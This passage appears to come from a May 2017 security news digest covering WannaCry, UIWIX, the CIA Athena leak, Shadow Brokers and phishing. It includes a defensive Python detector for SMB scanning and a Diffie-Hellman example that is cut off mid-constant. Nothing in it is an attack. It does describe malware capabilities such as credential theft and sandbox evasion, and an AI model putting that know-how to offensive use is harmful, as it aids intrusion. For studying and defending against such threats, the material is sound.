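from collections import defaultdict
from datetime import datetime, timedelta

SMB_PORT = 445


def build_sample_flows():
    """Return constructed flow records, one per line:
    "<ISO timestamp> <src_ip> <dst_ip> <dst_port>".
    10.0.0.5 behaves like a WannaCry-style scanner; the others are benign."""
    base = datetime(2017, 5, 12, 10, 0, 0)
    lines = []
    # 10.0.0.5 sweeps 30 different hosts on TCP/445, one per second.
    for i in range(1, 31):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} 10.0.0.5 10.0.1.{i} {SMB_PORT}")
    # 10.0.0.7 talks to a single file server: many flows, one destination.
    for i in range(40):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} 10.0.0.7 10.0.0.2 {SMB_PORT}")
    # 10.0.0.9 browses the web; non-SMB traffic is ignored by the detector.
    for i in range(30):
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} 10.0.0.9 93.184.216.{i} 80")
    return "\n".join(lines)


def parse_flows(text):
    """Parse flow lines into (timestamp, src, dst, port) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(port)))
    return records


def find_smb_scanners(records, window=timedelta(seconds=60), min_targets=20,
                      port=SMB_PORT):
    """Return {src_ip: max distinct targets} for every source that reached at
    least `min_targets` distinct hosts on `port` inside any sliding `window`."""
    by_src = defaultdict(list)
    for ts, src, dst, dst_port in records:
        if dst_port == port:
            by_src[src].append((ts, dst))

    flagged = {}
    for src, events in by_src.items():
        events.sort()
        start = 0
        best = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = len({dst for _, dst in events[start:end + 1]})
            best = max(best, distinct)
        if best >= min_targets:
            flagged[src] = best
    return flagged


if __name__ == "__main__":
    hits = find_smb_scanners(parse_flows(build_sample_flows()))
    for src, count in sorted(hits.items()):
        print(f"possible SMB scanner: {src} reached {count} hosts on TCP/{SMB_PORT}")
```

Only the sweeping host is reported; the host that opens many connections to one file server is not, because the check counts distinct destinations rather than connection volume. As the comparison table notes, UIWIX does not scan or propagate over the network, so this check would not surface it; detecting UIWIX has to rely on host-side signals such as the in-memory execution and the SMB exploitation itself.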

The most evident differences between WannaCry and UIWIX are:

UIWIX doesn't implement worm spreading capabilities;
UIWIX doesn't include a kill-switch;
UIWIX uses a different Bitcoin address for each victim.

Clearly, the WannaCry attack represents a great opportunity for the cybercrime ecosystem: every time a new flaw is discovered, crooks try to exploit it in attacks in the wild, for example by including the exploit code in crimeware kits used in hacking campaigns.

Recently we reported the case of the Adylkuzz botnet, another malware that exploited the EternalBlue exploit to spread a Monero miner.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to. Apart from WannaCry and UIWIX, our sensors also detected a Trojan delivered using EternalBlue—Adylkuzz (TROJ_COINMINER.WN). This malware turns infected systems into zombies and steals its resources in order to mine for the cryptocurrency Monero.” Trend Micro concludes.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching.”


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions
20.5.2017 securityaffairs BigBrothers

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine.
Last Friday, Wikileaks released the documentation for the AfterMidnight and Assassin malware platforms; today the organization leaked a new batch of the CIA Vault 7 dump that includes the documentation for a spyware framework dubbed Athena/Hera.

The batch of CIA files includes a user manual of the Athena platform, an overview of the technology, and a demo on how to use the malware.

Reading the documents, it emerges that almost any Windows system could be infected by the two spyware tools: Athena works from XP through Windows 10, and Hera from Windows 8 through Windows 10.

The Athena/Hera malware was used by the CIA to take remote control of infected Windows machines.
“The Athena System fulfills COG/NOD’s need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32- bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10.” reads the system overview included in the user guide. “Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post.”

The Athena spyware was written in Python and seems to date back to August 2015. If confirmed, this is worrying news, because Microsoft had released Windows 10 only in July 2015.

Athena is the result of joint work by CIA developers and their peers at the cybersecurity firm Siege Technologies, which specializes in offensive cybersecurity.

“Athena is a beacon loader developed with Siege Technologies. At the core it is a very simple implant application. It runs in user space and beacons from the srvhost process. The following diagram shows the concept of operation.” states the Athena Technology Overview.


The documents leaked by Wikileaks reveal the ability of the Athena spyware to modify its configuration in real time, customizing it to a specific operation.

“Once installed, the malware provides a beaconing capability (including configuration and task handling), the memory loading/unloading of malicious payloads for specific tasks and the delivery and retrieval of files to/from a specified directory on the target system,” WikiLeaks claims.

However, WikiLeaks has not provided any detail about the operations the agency conducted using Athena, though it is not hard to imagine how the intelligence agency would use this program to spy on its targets.

Below is the list of the main dumps leaked by WikiLeaks:

The Year Zero dump that revealed CIA hacking exploits for hardware and software.
The Weeping Angel spying tool to hack Samsung smart TVs and use them as
The Dark Matter dump containing iPhone and Mac hacking exploits.
The Marble batch, focused on a framework used by the CIA to make the attribution of cyber attacks harder.
The Grasshopper batch, which reveals a framework to customize malware for breaking into Microsoft's Windows and bypassing antivirus protection.
The Scribbles project for document tracking.
The Archimedes man-in-the-middle (MitM) attack tool.
The AfterMidnight and Assassin malware platforms.


North Korea Denies Role in Global Cyberattack

20.5.2017 securityweek Attack
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."


Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.


Google Launches Security Services for Android

20.5.2017 securityweek Android
Google this week launched a set of security services designed to bring improved protection and visibility for Android users.

Dubbed Google Play Protect, the new product is built into all devices with Google Play and should provide “comprehensive security services for Android,” the Internet giant says.

“Whether you’re checking email for work, playing Pokémon Go with your kids or watching your favorite movie, confidence in the security of your device and data is important,” Edward Cunningham, Product Manager, Android Security, notes.

“We know you want to be confident that your Android devices are safe and secure, which is why we are doubling down on our commitment to security,” he continues.

There are 2 billion active Android devices globally and Google performs more than 50 billion application scans every day to keep them safe.

With the help of machine learning, Google says it can discover new risks, identify potentially harmful apps, and either protect devices from them or remove them where they have been already installed.

Google also rigorously analyzes all apps before publishing them on the Play Store, though it isn't unheard of for malicious programs to slip into the marketplace and infect users by the millions.

According to Cunningham, Play Protect can also warn about bad apps downloaded from other sources. It is meant to keep an eye on all applications that perform nefarious operations on a device, in an attempt to keep users' data safe.

One of the features included in Google Play Protect is Find My Device, which is meant to help users even when they lose their devices.

“With Find My Device you can locate, ring, lock and erase your Android devices—phones, tablets, and even watches. This feature is built in and enabled on all devices,” Cunningham notes.

Users interested in learning more on this application should head to android.com/find or simply check the Find My Device app.

The new features will be rolling out to Android devices over the coming weeks.

Numerous infected applications were found in Google Play this year, ranging from fake system updates to mobile games, utility programs, and fake versions of popular streaming apps. In June last year, malicious versions of Pokémon GO landed in the storefront.


Disney Blackmailed Over Apparent Movie Hack: Reports

20.5.2017 securityweek Hacking
Disney chief Bob Iger said Monday hackers claiming to have access to one of the company's unreleased movies were demanding a "huge" ransom, according to US media reports.

He did not reveal which film had been stolen but said the company would not be giving in to the blackmail attempt, according to The Hollywood Reporter, quoting Iger from a meeting in New York with employees of the Disney-owned ABC television network.

The weekly reported on its website -- citing multiple unnamed sources -- that Disney is working with federal agents and monitoring for leaks online.

Movie website Deadline identified "Pirates of the Caribbean: Dead Men Tell No Tales," which opens on May 26, as the target, without revealing its sources, while some film writers speculated on Twitter that Pixar's "Cars 3," due for release next month, might have been hit.

Although both films are expected to do well for Disney, their profits are likely to be dwarfed by another film on the company's slate -- "Star Wars: The Last Jedi," which hits theaters on December 15.

"IMO, if it were 'Last Jedi,' he would pay in a heartbeat. But 'Pirates'... meh," Ryan Parker, a staff writer on the Hollywood Reporter, speculated on Twitter.

The cyber-thieves demanded to be paid in online currency Bitcoin and are threatening to release five minutes of the movie, followed by 20-minute segments until the ransom is delivered.

The hack follows a recent cyber attack on internet streamer Netflix that led to 10 episodes of "Orange is the New Black" being leaked ahead of release.

"Dead Men Tell No Tales" is the fifth in the "Pirates of the Caribbean" series, which stars Johnny Depp and has taken $3.7 billion at the box office since 2003.

Sci-fi novelist Paul Tassi, who comments on technology and the internet for Forbes Magazine, said "Pirates" would be unlikely to suffer were it the target, since its release date is so near.

"Yes, going to a movie in theaters is one of the more exhausting media experiences still left in society, but the kinds of people who are willing to pay money to see Johnny Depp stumble his way through a fifth 'Pirates of the Caribbean' movie in theaters are probably not the type to download a stolen copy of it right before it comes out," he said.

"And like all movies, 'Pirates' would appear on torrent sites regardless practically the day of its release, so the hackers seem to be really over-estimating their impact here."

More than 200,000 computers in 150 countries were hit by a ransomware cyberattack, described as the largest-ever of its kind, over the weekend.

Since Friday, banks, hospitals and government agencies have been among a variety of targets for hackers exploiting vulnerabilities in older Microsoft computer operating systems.

Microsoft president Brad Smith said the US National Security Agency had developed the code used in the attack.

The Walt Disney Company didn't respond to requests for comment.


Fileless Ransomware Spreads via EternalBlue Exploit

20.5.2017 securityweek Ransomware
A newly discovered ransomware family was found to be using the NSA-linked EternalBlue exploit for distribution and is capable of fileless infection, researchers have discovered.

Dubbed UIWIX, the malware was initially spotted on Monday, when the WannaCry outbreak was in the spotlight. The threat spreads by exploiting the same vulnerability in Windows SMBv1 and SMBv2 that WannaCry does.

Unlike WannaCry, UIWIX is executed in memory after exploiting EternalBlue, with no files or components being written to disk. This “greatly reduces its footprint and in turn makes detection trickier,” Trend Micro explains.

Furthermore, the security researchers say this ransomware family is also stealthier, containing code that allows it to terminate itself if a virtual machine (VM) or sandbox is detected. UIWIX also contains code that gathers the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.

Unlike WannaCry, UIWIX doesn't use autostart and persistence mechanisms and is distributed in the form of a Dynamic-link Library (DLL). Interestingly, the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, or Belarus, and it uses mini-tor.dll to connect to an .onion site.

UIWIX doesn't have worm spreading capabilities either, doesn't include a kill-switch, and uses a different Bitcoin address for each victim it infects. When accessed, a URL in the ransom note asks for a “personal code” that is included in the ransom note and prompts the user to sign up for a Bitcoin wallet if they don't have one.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to,” Trend Micro notes.

Before WannaCry and UIWIX, however, the EternalBlue exploit was leveraged by the Adylkuzz botnet, which abuses infected systems to mine for the cryptocurrency Monero.

Already ported to Metasploit, EternalBlue is one of the exploits released by the hacker group known as The Shadow Brokers after allegedly stealing it from the National Security Agency-linked Equation Group. Microsoft patched the targeted vulnerability before the exploit's public release, and also issued an emergency patch for older platform versions.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching. Enterprises must balance how it sustains the efficiency of [their] business operations while also safeguarding them. IT/system administrators and information security professionals, their sentry, should enforce strong baselines that can mitigate attacks that threaten the integrity and security of their systems and networks,” Trend Micro concludes.


Financial Firms Struggle on Compliance for non-Email Communications

20.5.2017 securityweek Security
Financial services is perhaps the most regulated sector in industry. SEC, FINRA and Gramm-Leach-Bliley are merely the better known of a raft of regulations. Key to all of them is the requirement to manage and retain communications. But just as regulations have increased and become more complex, so too has the number of communication methods that need to be monitored ballooned. What was once just email now includes SMS, public IM, a variety of social media and more. At the same time, regulators are becoming more active.

The 2017 Electronic Communications Compliance Survey (PDF) from Smarsh demonstrates continuing industry concern over its ability to capture and retain relevant staff communications, especially from mobile devices. Interestingly, Europe's GDPR will add to the regulation mix, but will expand the industry coverage from finserv to any organization doing business with Europe. While finserv regulations are concerned with financial data in communications, GDPR is concerned with personal data in communications. Different detail, but same basic problem: the control of regulated data getting dispersed in uncontrolled communications.

The problem is the same. So it follows that the difficulties and concerns voiced by finserv organizations over communications compliance will apply to all industry sectors by the end of May 2018.

Smarsh surveyed 119 finserv individuals in compliance supervisory roles ranging from c-level to operations. It found that the top three concerns for regulatory compliance are non-email communications, mobile devices, and simply understanding new and challenging regulations. In each case, the level of concern has increased dramatically over 2016 levels.

Non-email and mobile device communications overlap. Employees are increasingly using personal devices for non-email quick communication with customers, potential customers, colleagues and friends. Text/SMS messaging is considered to pose the greatest compliance risk (52% of respondents). Noticeably, in December 2016 FINRA fined a Georgia firm $1.5 million partly for failure to retain approximately one million text messages sent using firm-issued devices.

All of this is against a backdrop of more frequent, deeper and broader regulatory examinations. In 2015, 27% of firms were examined in a 12-month period; in 2016 it was 42%; and in 2017 it rose to 47%. The biggest single change in the examinations has been the regulators' increasing requests for social media communications. In 2015, 19% of examiners requested social media comms -- but by 2017, this had increased to 44% for LinkedIn, 27% for Facebook, 21% for Twitter, and 6% for Instagram.

The examiners are also looking at firms' mobile communication policies. In the last year, 21% of the examined respondents had to provide their mobile device communications policy. Policy, however, has its own issues. Of those firms that allow text/SMS messaging, 36% do not have a written policy governing its use. Smarsh suggests, however, that any firm not supervising mobile use should now expect to be fined.

The problem for business is that mobile communications is not a risk that can be avoided. "Firms need to leverage new and emerging channels to communicate with their customers and stay competitive, but they're failing to manage the risk," explains Stephen Marsh, CEO and founder of Smarsh.

Simple prohibition is not a solution. Where it is used, survey respondents' confidence in its effectiveness is low. Asked if they would be able to prove that prohibition is working, the confidence gap over text/SMS, and also LinkedIn, stands at 67%. For Twitter it is 57%, and for public IM it is 55%.

"This year's survey," comments CEO Stephen Marsh, "reinforces that policies of prohibition are a barrier to growing business and workforce productivity. They do not deliver compliance confidence, and they simply don't work. Early 2017 examples of text-related firm penalties all have one thing in common: all prohibited its use for business communication. More than two thirds (67 percent) of respondents have no or minimal confidence that they could prove their prohibition of text messaging is actually working."

There is a bonus. While compliance is the primary driver for communications archiving and supervision, 88% of the respondents recognize that communications data can also help identify more general security risks to the organization. "More than half of respondents (59%)," notes the report, "confirm that their organization uses this data to identify fraudulent activity, among other purposes, such as supporting e-discovery and HR issues, and detecting market abuse."

It is worth stressing that the 2017 Smarsh survey relates directly to compliance in the financial services industry. The arrival of the General Data Protection Regulation in May 2018 will create the same basic communications content compliance requirements across all industries. In preparing for GDPR, all industry sectors can learn from the non-email communications compliance problems already being experienced by Finserv.


Paying the WannaCry ransom is useless: the encrypted files are not unlocked

19.5.2017 SecurityWorld Viruses
Check Point Software Technologies has published a new live map of the WannaCry ransomware infection, showing the current extent of the international ransomware epidemic. According to the company, decryption of the encrypted files also does not work. Eset has likewise published statistics on how individual countries were hit.

The map shows key statistics and per-country data in real time. It is available at https://attacks.mgmt.cloud/.

It indicates that WannaCry continues to attack organizations around the world, currently infecting one machine every three seconds. The authors, however, apparently do not unlock any files; they merely collect money from the victims.

The researchers were able to track 34,300 attack attempts in 97 countries. Today an attack attempt occurs on average every 3 seconds, a slight decline from the original pace two days ago, when an attempt was recorded every second. Attack attempts were recorded most often in India, the USA and Russia.

Check Point found that organizations hit by the WannaCry ransomware are unlikely to get their files back, even if they pay the ransom.

The problematic payment and decryption system and a faked demonstration of the decryption process raise the question of whether the WannaCry developers are able to keep their promise and decrypt files once the ransom is paid.

So far, the 3 Bitcoin accounts associated with the WannaCry campaign have received roughly 77,000 dollars from victims. Despite this, and unlike many other ransomware variants, no case has yet been recorded of anyone getting their files back.

Eset has also published detection statistics for the ransomware Win32/Filecoder.WannaCryptor.D, i.e. WannaCry. They show that users in Russia were hit hardest by this type of malware, accounting for almost half of all detections, followed by Ukraine and Taiwan.

The Czech Republic is only in 52nd place on the list of affected countries. According to Eset this is partly because the threat was detected very early, which prevented greater damage, and partly because the Czech Republic was probably not a primary target of this attack.

Detection of the threat alone, however, does not mean that a computer was actually infected.

Eset says it has also caught a number of fake WannaCry versions; these do not pose a greater risk and are intended mostly just to scare users.

Share of WannaCry infections by country

1. Russia (45.07%)
2. Ukraine (11.88%)
3. Taiwan (11.55%)
4. Philippines (2.95%)
5. Egypt (2.38%)
6. Iran (2.16%)
7. India (1.69%)
8. Thailand (1.55%)
9. Italy (1.19%)
10. Turkey (1.06%)
...
37. Slovakia (0.26%)
52. Czech Republic (0.15%)

Source: Eset, 16 May 2017


NSA exploits or secret information: for a subscription fee they could be yours too

19.5.2017 SecurityWorld BigBrother
The hacker group known as the Shadow Brokers, which earlier drew attention to itself by publishing alleged NSA exploits, has announced that it holds a number of further tools intended for cyberattacks. It plans to distribute them on a subscription basis.
It also claims to have data collected by the NSA concerning foreign banks and ballistic missile programs.

The Shadow Brokers are, for example, also responsible for EternalBlue, the Windows SMB exploit that attackers have already used to infect hundreds of thousands of computers worldwide through the rapidly spreading WannaCry ransomware.

The group is relatively new on the hacking scene; it first made itself known in August by claiming it had got hold of the arsenal of the cyber-espionage group known in security circles as The Equation, which is commonly described as the NSA's hacking division.

On Tuesday, after the rapid spread of the WannaCry ransomware, the Shadow Brokers published a new post claiming that many of the Equation group's exploits have not yet been used or published. The group wants to make them available through a subscription, and the Shadow Brokers plan to launch the service as early as June.

At first the group provided sets of tools for breaking the security of routers and firewalls, but it claimed to have many more such products and wanted to sell them for 10,000 or more bitcoins (around 12 million US dollars). Because it attracted no buyer, the group released more information, including the IP addresses of systems that Equation had targeted.

The Shadow Brokers seemed to vanish from the scene in January after deleting their online accounts. In April, however, they made a surprise return and published the password to an encrypted archive containing many exploits for Linux and Windows, as well as malware allegedly used by the Equation hackers.

Most of the vulnerabilities the leaked exploits target have, however, already been fixed, including EternalBlue, which Microsoft quickly patched in March.

According to the hackers, the data will be released gradually each month through the subscription; the service is to include exploits for web browsers, routers, mobile devices and Windows 10, as well as data extracted by the Equation group during its cyber-espionage. The information is to include, for example, data stolen from SWIFT providers and central banks, and data from "Russian, Chinese, Iranian and North Korean nuclear and missile programs".

What subscribers do with these exploits and information will be up to them, say the Shadow Brokers.

It does not appear, however, that anyone has ever paid for access to the Equation arsenal, or at least this is not publicly known. The group has even expressed in its offers its frustration at the evident lack of interest, which is not unusual.

A large proportion of similarly shocking announcements and unexpected leaks turn out to be wholly or partly unrealistic, and the sums demanded are usually completely exorbitant; the hackers' great willingness to haggle over the price, change the method of sale or rapidly cut the price does not exactly inspire confidence either.

Apart from the obvious illegality, making use of the exploits and other hacks is also problematic, since they are usually fixed very quickly.

It is not certain whether the subscription system will attract more interest; the group has not yet disclosed the price. The Shadow Brokers have, however, published genuinely legitimate information and real exploits in the past, which many believe may originate from the NSA.

It is therefore likely that this data will sooner or later make its way into the public reaches of the internet, by whatever route.


Company receives record four-million fine for spam

19.5.2017 Novinky/Bezpečnost Spam
The Office for Personal Data Protection has imposed a record fine of 4.25 million crowns on the company Eurydikapol for distributing unsolicited commercial communications, so-called spam. The Office imposed the fine on Tuesday; its spokesman Tomáš Paták announced it on Friday.
"The Office arrived at this so far highest amount on the basis of an assessment of the complaints filed, of which it received around 700. These unsolicited commercial communications were sent repeatedly for almost a year," said the Office's chairwoman Ivana Janů.

The company Eurydikapol (formerly JH Holding) sent unsolicited commercial communications without the consent required by law, thereby committing an administrative offence. Moreover, the recipients were not even its customers.

"In setting the amount of the penalty, the Office took into account both the total number of complaints received and the number of unique addresses to which the commercial communications were sent, that is, the number of people affected by such unlawful conduct," Janů specified.

The record amount was also driven by the fact that the company continued to send unsolicited commercial communications even after the inspection had begun, disregarding the warnings of the personal data watchdog.

"An aggravating circumstance was also the fact that the distribution of the commercial communications was highly annoying, since several dozen nuisance e-mails were delivered to some addresses, and in one case almost two hundred unsolicited commercial communications were delivered," the head of the Office concluded.

The previous highest fine, 1.9 million crowns, was imposed by the Office in 2015 on the company Traffic7, Paták told Novinky.


Virus WannaCry útočil nejvíce v Rusku. Česko je až na spodních příčkách

19.5.2017 Novinky/Bezpečnost  Viry
Přesně před týdnem se takřka celým světem začal jako lavina šířit vyděračský virus WannaCry. Ten za pouhých pár hodin stihl nakazit více než 300 000 počítačů ve více než 150 zemích světa. Nejvíce se přitom tento nezvaný návštěvník šířil v Rusku, jak ukázala analýza antivirové společnosti Eset.
Takřka polovina všech zachycených detekcí (45,07 %) připadá právě na Rusko. Je to dáno tím, že především v tamních chudých lokalitách ještě uživatelé hojně používají zastaralý operační systém Windows XP, který byl proti škodlivému kódu WannaCry nejvíce zranitelný.

Druhou a třetí příčku pak zaujaly Ukrajina (11,88 %) a Tchaj-wan (11,55 %). Ostatní státy, které se dostaly v žebříčku nejpostiženějších zemí do první desítky, měly podíl tak v řádech jednotek procent. Šlo například o Egypt, Indii či Filipíny, jak ukazuje tabulka níže:

Deset států, kde se virus WannaCry šířil nejvíce
1. Rusko (45,07 %)
2. Ukrajina (11,88 %)
3. Tchaj-wan (11,55 %)
4. Filipíny (2,95 %)
5. Egypt (2,38 %)
6. Irán (2,16 %)
7. Indie (1,69 %)
8. Thajsko (1,55 %)
9. Itálie (1,19 %)
10. Turecko (1,06 %)
Zdroj: Eset
Na Slovensku více než v Česku
Česká republika skončila v přehledu s podílem 0,15 % až na 52. místě. Sluší se nicméně podotknout, že spodní příčky měly velmi podobný podíl až prakticky do konce žebříčku, který obsahovat 150 států. Například sousední Slovenko však na tom bylo hůře – virus WannaCry tam měl podíl 0,26 %.

V Česku byly přitom infikovány stovky strojů. „Podle našich údajů počet infekcí překonal číslovku 620,“ uvedl na dotaz Novinek Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ.

S ohledem na množství infekcí v zahraničí to však bezpečnostní experti považují za úspěch. „České republice se tato aktuální kampaň prakticky vyhnula. Zaznamenali jsme velice nízký počet detekcí. Rovněž jsme do této chvíle nezaznamenali zasažení ani žádné významné instituce, které by byly alespoň částečně tímto druhem malware ochromeny,“ řekl Robert Šuman, vedoucí pražského detekčního a analytického týmu společnosti Eset.

„Důvody, proč se WannaCry v tuzemsku nešířil více, jsou v tuto chvíli známé dva. Tím prvním je velmi brzká detekce této hrozby, která zamezila větším škodám. Tím druhým je, že Česká republika pravděpodobně nebyla primárním cílem tohoto útoku,“ dodal Šuman.

Piráti si moc nevydělali
WannaCry – první i vylepšená druhá generace – útočí úplně stejně jako ostatní vyděračské viry, které jsou označovány souhrnným názvem ransomware. Nejprve tedy škodlivý kód pronikne do počítače, pak jej uzamkne a zašifruje všechna data. Za jejich zpřístupnění následně počítačoví piráti požadují výkupné.

Tom Bossert, security adviser to US President Donald Trump, previously stated that this extortion virus earned cybercriminals less than 70,000 dollars, that is, almost 1.7 million Czech crowns.

Given the number of infected computers, that is a low sum. Since the cybercriminals demanded a ransom of roughly CZK 7,300, it is very likely that the vast majority of affected users decided not to give the computer pirates a single penny.


Number of Phishing Sites Using HTTPS Soars

19.5.2017 securityweek Phishing
The number of phishing websites using HTTPS has increased considerably over the past few months since Firefox and Chrome have started warning users when they access login pages that are not secure.

Internet security services firm Netcraft reported on Wednesday that, since late January, the proportion of phishing sites using HTTPS increased from roughly 5% to 15%.

One explanation for the rise is that, in late January, both Google and Mozilla implemented HTTP warnings in their Chrome and Firefox web browsers in an effort to protect their customers against man-in-the-middle (MitM) attacks.

Users of Chrome 56 and later, and Firefox 51 and later are warned when they are about to enter their credentials on a login page that does not use HTTPS. Since most phishing sites had been served over HTTP connections, cybercriminals may have realized that they need to step up their game and move to HTTPS.

“If the new browser behaviour has driven this change — and the timing suggests it might have — then it may have also had the unintended side effect of increasing the efficacy of some phishing sites,” explained Netcraft’s Paul Mutton. “Phishing sites that now use HTTPS and valid third-party certificates can appear more legitimate, and therefore increase the likelihood of snaring a victim.”

Phishing sites using HTTPS

Another possible explanation, according to the expert, is that the warnings introduced by Google and Mozilla encouraged website administrators to migrate to HTTPS. Since phishing pages are often hosted on legitimate sites that have been compromised, this may have also been a factor in the significant increase of phishing sites using HTTPS.

On the other hand, Mutton pointed out that some popular browsers, such as Microsoft’s Edge and Internet Explorer, don’t display any warnings for login pages, which means phishing sites served over HTTP will still be effective in many cases.

Cybercriminals have been coming up with clever ways to phish users’ credentials. One recent campaign aimed at Google customers leveraged a fake Google Docs application. Google quickly killed the operation, but the incident showed that malicious actors continue to improve their methods.


Medical Devices Infected With WannaCry Ransomware

19.5.2017 securityweek Ransomware
WannaCry ransomware on medical devices

Several medical device manufacturers released security advisories this week following reports that the notorious WannaCry ransomware has infected some medical devices.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, leverages a couple of exploits allegedly developed by the NSA and leaked recently by a hacker group called Shadow Brokers. The threat has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

Britain’s National Health Service (NHS) was among the worst hit by the malicious campaign, and the incident clearly showed the risk posed by WannaCry to healthcare organizations. However, initial reports suggested that the malware had mainly affected management systems.

The U.S.-based Health Information Trust Alliance (HITRUST) later reported seeing evidence of Bayer (Medrad), Siemens and other medical devices getting infected with WannaCry. Bayer confirmed for Forbes that two of its customers in the United States had informed it about ransomware infections.

Since many medical devices run Windows and are connected to the local network, they can easily be infected with WannaCry.

ICS-CERT has provided a list of vendors that have released security advisories to warn customers of the risks and provide them with recommendations on how to prevent attacks.

The list includes Rockwell Automation, BD (Becton, Dickinson and Company), Schneider Electric, ABB, Siemens, General Electric, Philips, Smiths Medical, Johnson & Johnson, and Medtronic. Some of these vendors have also issued warnings about the threat posed to their industrial products.


BD has published a list of tens of potentially vulnerable devices and provided recommendations for securing Windows-based systems. Siemens has released separate advisories for each affected Healthineers product, including magnetic resonance, laboratory diagnostics, tomography, radiography, X-ray, mammography, molecular diagnostics, and molecular imaging devices.

Siemens says it’s working on updates that will patch Server Message Block (SMB) vulnerabilities in affected products, and shared some countermeasures until fixes become available. WannaCry exploits one particular SMB vulnerability patched by Microsoft in March, but the fix for this flaw also addresses several other SMB weaknesses.

Other medical device vendors have not listed affected products, but warned customers that all Windows-based systems are at risk. Some highlighted that they had not been aware of any incidents involving their products.

“The WannaCry medical device infections show that data isn’t the only digital asset being targeted. They further demonstrate that if these devices can be impacted, so too can mission-critical infrastructures, industrial IoT devices and control systems. When one of these targets falls prey to ransomware, the outcome could be catastrophic — measured in terms of human injury and lives as opposed to just a few bitcoins,” said Dean Weber, CTO of industrial IoT security provider Mocana.

“IT, OT and security professionals in hospitals and other mission critical environments should act immediately to patch systems, especially those running Windows. They should also consider taking proactive steps that could include adding multi-factor authentication, stronger encryption and embedding security directly into devices to establish more effective trust,” Weber concluded.


Stegano Exploit Kit Adopts the Diffie-Hellman Algorithm

19.5.2017 securityweek Exploit
After receiving multiple updates, the Stegano exploit kit (EK) recently adopted the Diffie-Hellman algorithm to hinder analysis, Trend Micro security researchers warn.

Also known as Astrum, Stegano was previously associated with a massive AdGholas malvertising campaign that delivered Trojans such as Gozi and RAMNIT. The EK was also seen being used in the Seamless malvertising campaign, which normally employs RIG instead.

In late March, Proofpoint security researcher Kafeine discovered the EK abusing CVE-2017-0022, an information disclosure vulnerability in Windows that was patched on March 14. The exploit was used to look for antivirus apps on the system to evade detection and analysis.

In April, the threat received an update that prevented security researchers from replaying the malicious network traffic. The feature abuses the Diffie-Hellman key exchange, which is widely used to establish the shared keys that secure network protocols.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult,” Trend Micro notes.
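The reason a captured Diffie-Hellman exchange does not hand the analyst the payload key is worth seeing in code. The following is an added example, not Trend Micro's analysis code or anything from the exploit kit: two endpoints agree on a key over a channel that a passive observer records in full, and the observer still cannot reproduce the key from what crossed the wire, nor obtain it by replaying the captured client value to the server. The group is the 2048-bit MODP group 14 from RFC 3526 (verified at runtime as a safe prime); deriving the session key as SHA-256 over the shared secret is an assumption for illustration, not the kit's own scheme.

```python
"""Added example: why a passive capture of a Diffie-Hellman exchange does not
yield the session key. Not code from the page, Trend Micro or the exploit kit."""
import hashlib
import secrets

# RFC 3526 "group 14": p = 2^2048 - 2^1984 - 1 + 2^64 * { [2^1918 pi] + 124476 }
P_HEX = """
FFFFFFFF FFFFFFFF C90FDAA2 2168C234 C4C6628B 80DC1CD1 29024E08 8A67CC74
020BBEA6 3B139B22 514A0879 8E3404DD EF9519B3 CD3A431B 302B0A6D F25F1437
4FE1356D 6D51C245 E485B576 625E7EC6 F44C42E9 A637ED6B 0BFF5CB6 F406B7ED
EE386BFB 5A899FA5 AE9F2411 7C4B1FE6 49286651 ECE45B3D C2007CB8 A163BF05
98DA4836 1C55D39A 69163FA8 FD24CF5F 83655D23 DCA3AD96 1C62F356 208552BB
9ED52907 7096966D 670C354E 4ABC9804 F1746C08 CA18217C 32905E46 2E36CE3B
E39E772C 180E8603 9B2783A2 EC07A28F B5C55DF0 6F4C52C9 DE2BCBF6 95581718
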